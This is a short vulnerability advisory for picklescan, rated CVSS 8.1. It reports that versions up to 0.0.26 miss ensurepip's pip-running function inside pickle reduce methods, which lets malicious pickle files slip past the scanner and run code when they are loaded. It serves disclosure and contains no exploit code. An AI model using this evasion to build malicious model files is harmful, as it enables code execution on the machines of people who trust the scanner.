PT-2026-51384 · Picklescan · Picklescan
Fredericdt
·
Published
2026-06-22
·
Updated
2026-06-22
·
CVE-2025-71344
CVSS v3.1
8.1
High
| Vector | AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N |
picklescan before 0.0.30 (affected versions 0.0.26 and earlier) fails to detect the ensurepip. run pip built-in function when scanning pickle files, allowing attackers to execute arbitrary code. Malicious pickle files embedding ensurepip. run pip calls in reduce methods bypass picklescan detection and achieve remote code execution upon pickle.load() invocation.
Fix
Deserialization of Untrusted Data
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Picklescan